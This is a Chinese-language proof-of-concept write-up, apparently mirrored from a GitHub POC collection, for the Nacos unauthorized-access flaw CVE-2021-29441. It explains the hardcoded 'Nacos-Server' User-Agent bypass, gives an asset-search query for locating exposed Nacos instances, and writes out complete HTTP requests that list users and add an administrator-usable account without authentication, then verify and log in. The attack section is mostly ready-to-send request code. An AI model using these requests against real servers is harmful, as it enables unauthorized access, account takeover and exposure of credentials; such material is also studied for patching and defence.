mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 14:04:06 +00:00
77 lines
3.2 KiB
Markdown
77 lines
3.2 KiB
Markdown
# Nacos未授权访问漏洞(CVE-2021-29441)
|
||
|
||
# 一、漏洞简介
|
||
<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。</font>
|
||
|
||
# <font style="color:rgb(63, 63, 63);">二、影响版本</font>
|
||
+ <font style="color:rgb(63, 63, 63);">Nacos <= 2.0.0-ALPHA.1</font>
|
||
|
||
# <font style="color:rgb(63, 63, 63);">三、资产测绘</font>
|
||
+ hunter`app.name="Nacos"`
|
||
+ 特征
|
||
|
||

|
||
|
||
# 四、漏洞复现
|
||
poc
|
||
|
||
```plain
|
||
GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
|
||
User-Agent: Nacos-Server
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||
Accept-Language: zh-CN,zh;q=0.9
|
||
Connection: close
|
||
Cache-Control: no-cache
|
||
Pragma: no-cache
|
||
Host:
|
||
```
|
||
|
||

|
||
|
||
通过未授权访问漏洞添加账号
|
||
|
||
```plain
|
||
POST /nacos/v1/auth/users HTTP/1.1
|
||
Host:
|
||
User-Agent: Nacos-Server
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||
Accept-Encoding: gzip, deflate
|
||
Connection: close
|
||
Upgrade-Insecure-Requests: 1
|
||
Sec-Fetch-Dest: document
|
||
Sec-Fetch-Mode: navigate
|
||
Sec-Fetch-Site: same-origin
|
||
Pragma: no-cache
|
||
Cache-Control: no-cache
|
||
Content-Type: application/x-www-form-urlencoded
|
||
Content-Length: 27
|
||
|
||
username=test&password=test
|
||
```
|
||
|
||

|
||
|
||
查看是否添加成功
|
||
|
||
```plain
|
||
GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
|
||
User-Agent: Nacos-Server
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||
Accept-Language: zh-CN,zh;q=0.9
|
||
Connection: close
|
||
Cache-Control: no-cache
|
||
Pragma: no-cache
|
||
Host:
|
||
```
|
||
|
||

|
||
|
||
使用添加的账号登录
|
||
|
||

|
||
|
||
|
||
|
||
> 更新: 2024-10-28 15:59:45
|
||
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gygvcmtv1bh6n6za> |